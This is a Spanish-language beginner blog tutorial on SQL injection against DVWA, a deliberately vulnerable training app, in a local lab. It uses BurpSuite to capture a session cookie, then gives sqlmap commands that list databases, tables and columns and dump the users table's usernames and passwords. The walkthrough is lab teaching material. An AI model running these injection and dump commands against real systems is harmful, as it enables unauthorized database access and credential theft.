Vulnerability: SQL Injection DVWA EN KALI LINUX Parte 2

El otro día había escrito sobre XSS y file uploads ahora toca con SQL. Recuerda que los métodos que muestro son para principiante, si veo esté post tiene una gran cantidad de apoyo, sigo compartiendo más. También recuerda que DVWA todo es vulnerable y no quiero ser un spoiler para muchas personas en desarrollar todo.


Lo que vamos a necesitar será:

  • BurpSuite
  • Sqlmap

Primeramente configuramos BurpSuite. Se preguntarán como ? Bueno he escrito un post sobre esto. AQUÍ

Me imagino al leer el post anterior tendrás concepto sobre la configuración. Al ejecutar DVWA vamos a la opción “SQL Injection”

Screenshot from 2016-07-31 20-35-14

Los pide hacer click y nos abrirá otra ventana que vamos ejecutar números del 1 al 5 y nos mostrará nombre. Como sabemos sobre una SQL? He escrito otro post sobre eso. AQUÍ

Screenshot from 2016-07-31 20-38-45
En este paso estos corriendo números del 1 al 5. Algo muy simple, ahora intentemos con >'<y veamos el resultado

Screenshot from 2016-07-31 20-40-09

Algo resultado malo. Pero probemos con burpsuite. Al colocar >'< nos muestra lo siguiente. En el cual nos da información.

Screenshot from 2016-07-31 20-42-39
No tenemos ninguna respuesta solo información.
1. URL

2. HOST

3 Cookie que nos va hacer muy útil

Pero que pasa si coloco index.php y colocamos la ID y cambiamos el nivel de seguridad desde burpsuite con sqlmap.

Screenshot from 2016-07-31 20-49-05

Nos muestra GET con la index.php y la cookie sigue siendo la misma sin necesidad de cambiar la clase de seguridad.

Ahora que tenemos?
URL y cookie que va hacer útil.
Ahora vamos a usar SQLMAP

 

 

 sqlmap -h

Ahora vamos a ejecutar la URL y la cookie con bajo de seguridad.

sqlmap -u 'http://192.168.1.5/dvwa/vulnerabilities/sqli/index.php?id=2&Submit=Submit' --cookie='security=low; PHPSESSID=pbqh524j5gouv3h3isg0q7fvi2' --string=Surname --dbs

Te cuento rápidamente corremos el escaneo de la URL luego verifica las cookie y al final hace un string para empezar a ver la base de datos. Tienes más dudas? Puedes ir las URL que te ofrece DVWA sobre ese tema.

Ahora se dieron cuenta que baje la clase de seguridad? Y ahora si podemos ver la base de datos.
Screenshot from 2016-07-31 20-55-13

Screenshot from 2016-07-31 21-03-34

Listo ahora puedes usar el método que te enseñe ver las tablas y todo sobre una SQL en mi post.
Por las dudas dejare los comandos.

 

 sqlmap -u 'http://192.168.1.5/dvwa/vulnerabilities/sqli/index.php?id=2&Submit=Submit' --cookie='security=low; PHPSESSID=pbqh524j5gouv3h3isg0q7fvi2' --string=Surname -D dvwa --tables
 sqlmap -u 'http://192.168.1.5/dvwa/vulnerabilities/sqli/index.php?id=2&Submit=Submit' --cookie='security=low; PHPSESSID=pbqh524j5gouv3h3isg0q7fvi2' --string=Surname -D dvwa -T users --columns
 sqlmap -u 'http://192.168.1.5/dvwa/vulnerabilities/sqli/index.php?id=2&Submit=Submit' --cookie='security=low; PHPSESSID=pbqh524j5gouv3h3isg0q7fvi2' --string=Surname -D dvwa -T users -C user,password --dump

Screenshot from 2016-07-31 21-07-53
Recuerda que lo hago con la mejor forma educativa porque es parecido cuando te encuentres un fallos de seguridad. Espero haberte ayudado y no te olvides de compartilo.